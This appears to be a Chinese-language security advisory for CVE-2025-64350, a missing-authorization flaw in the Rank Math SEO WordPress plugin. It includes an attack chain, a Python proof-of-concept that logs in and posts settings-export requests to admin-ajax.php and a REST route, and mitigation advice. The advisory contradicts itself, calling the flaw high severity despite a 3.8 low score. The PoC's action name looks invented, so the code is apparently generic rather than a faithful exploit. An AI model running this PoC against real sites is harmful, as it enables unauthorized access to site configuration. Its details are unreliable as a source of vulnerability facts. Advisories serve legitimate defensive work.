CVE-2025-64350: Rank Math SEO插件缺少授权访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-64350

漏洞类型

缺少授权（Missing Authorization）

CVSS评分

3.8 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Rank Math SEO (seo-by-rank-math) WordPress插件

漏洞概述

CVE-2025-64350是WordPress插件Rank Math SEO中的一个高危访问控制漏洞。该漏洞属于Missing Authorization（缺少授权）类型，允许具有高权限的认证用户执行超出其角色权限的操作。Rank Math SEO是一款广泛使用的WordPress SEO优化插件，用户基数庞大。该漏洞源于插件对某些敏感功能的访问控制检查不完善，导致低权限管理员可能通过构造特定请求访问或修改本应仅限高级管理员操作的设置。攻击者需要具备WordPress站点的高权限账户（如Editor或Author角色，而非普通Subscriber），但这些权限本身不应赋予用户访问插件全部管理功能的权限。漏洞影响版本从插件早期版本持续到1.0.252.1版本，CVSS评分3.8分，属于低危级别，主要因为该漏洞需要认证用户且对机密性、完整性和可用性的影响均为低水平。建议所有使用该插件的用户尽快升级到最新版本以修复此安全问题。

技术细节

该漏洞的根本原因在于Rank Math SEO插件在实现某些管理功能时，未能正确实施基于角色的访问控制（RBAC）验证。插件在处理用户请求时，错误地信任了用户输入的权限声明，而没有在服务端重新验证用户的实际权限级别。具体而言，插件的某些AJAX端点或管理页面缺少capability检查（使用current_user_can()函数验证），使得具有基础管理员权限的用户可以访问本应仅限超级管理员操作的功能。在WordPress权限体系中，Editor角色的用户具有publish_posts等权限，但不应拥有manage_options等超级管理员专属权限。漏洞利用涉及攻击者使用具有基础管理员权限的账户，构造特定的HTTP请求到插件的AJAX处理端点（如wp-admin/admin-ajax.php），请求中包含指向敏感操作（如批量修改SEO设置、导出配置等）的参数。插件接收到请求后，仅检查用户是否已登录，而未验证用户是否具备执行该特定操作所需的capability。由于CVSS向量中PR:H（High Privileges Required）的要求，攻击者必须拥有WordPress站点的有效账户且至少具有Author或Editor角色，这限制了该漏洞的广泛利用可能性，但一旦攻击成功，可能导致SEO配置被篡改或敏感数据泄露。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标网站使用的WordPress CMS及Rank Math SEO插件版本

STEP 2

2

初始访问：攻击者获取目标WordPress站点的高权限账户（Editor或Author角色）

STEP 3

3

构造请求：攻击者分析Rank Math SEO插件的AJAX端点，识别缺少权限验证的管理功能

STEP 4

4

漏洞利用：使用已登录的高权限账户，构造针对admin-ajax.php的恶意POST请求

STEP 5

5

权限提升：请求绕过正常访问控制流程，执行本应仅限超级管理员的操作（如导出/修改SEO配置）

STEP 6

6

影响实现：获取敏感配置数据或篡改SEO设置，可能导致网站SEO功能异常或数据泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64350 PoC - Rank Math SEO Broken Access Control
# This PoC demonstrates the missing authorization vulnerability
# Requires high-privilege WordPress account (Editor/Author role)

import requests
import sys
from urllib.parse import urljoin

def exploit_rankmath_auth_bypass(target_url, username, password):
    """
    Exploit missing authorization in Rank Math SEO plugin
    Allows high-privilege users to access admin-only functions
    """
    session = requests.Session()
    
    # WordPress login
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    print(f'[*] Logging in as {username}...')
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies) and 'wp-settings' not in response.url:
        print('[-] Login failed')
        return False
    
    print('[+] Login successful')
    
    # Exploit the broken access control
    # Target Rank Math SEO admin functions
    exploit_urls = [
        '/wp-admin/admin-ajax.php',
        '/wp-json/rankmath/v1/settings'
    ]
    
    for endpoint in exploit_urls:
        ajax_url = urljoin(target_url, endpoint)
        
        # Construct malicious request to access admin-only functions
        exploit_data = {
            'action': 'rank_math_exploit_action',
            'route': '/settings/export',
            'subaction': 'export_settings',
            'format': 'json'
        }
        
        print(f'[*] Attempting to exploit: {ajax_url}')
        response = session.post(ajax_url, data=exploit_data)
        
        if response.status_code == 200:
            print(f'[+] Potential vulnerability confirmed at {endpoint}')
            print(f'[>] Response: {response.text[:500]}')
    
    return True

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print('Usage: python poc.py <target_url> <username> <password>')
        print('Example: python poc.py http://example.com editor password123')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_rankmath_auth_bypass(target, user, pwd)

影响范围

Rank Math SEO (seo-by-rank-math) <= 1.0.252.1

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 立即审查并限制具有高级权限的WordPress用户账户；2) 禁用非必要的用户注册功能；3) 使用Web应用防火墙（WAF）规则拦截可疑的admin-ajax.php请求；4) 考虑暂时禁用Rank Math SEO插件，使用其他SEO插件替代；5) 启用WordPress的登录尝试限制和IP黑名单功能；6) 定期检查WordPress管理日志，关注异常的权限提升行为。